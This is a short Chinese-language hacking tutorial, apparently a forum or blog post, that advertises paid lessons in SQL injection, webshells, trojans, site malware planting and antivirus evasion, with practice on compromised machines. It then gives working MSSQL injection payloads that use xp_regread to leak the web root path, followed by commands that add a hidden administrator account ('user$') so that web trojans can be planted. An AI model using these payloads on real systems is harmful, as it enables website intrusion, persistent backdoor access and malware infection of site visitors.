条件:要勤奋好学、不耻下问、只收菜鸟。 教学时间:星期一、星期六、日。
教程内容:SQL注入技术、拿网站webshell、VB编程、电脑中木马问题、网站挂马、打造防杀马。
教学环境:QQ语音动画授课和发布我总结的资料动画,每个星期有动画观看和肉鸡环境实践。
目的:主要是学到一门技术。QQ:287052950 只收菜鸟,学费200元。 加的时候注明学习。
当你拿到了注入点时。但不知道站的绝对路径。这是需要用到sql语句爆绝对路径。
在IE里输入:
1\;create table [dbo].[cyfd] ([gyfd][char](255));
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values( @result );--
爆出WEBSHELL的绝对路径:
and 1=(select count(*) from cyfd where gyfd > 1)
;drop table cyfd;--
2\然后执行系统命令:
net user user$ /add
net localgroup administrators user$ /add
这样就可以拿到站的webshell权限了、然后挂网马了。
相关文件(rar):
点这儿打开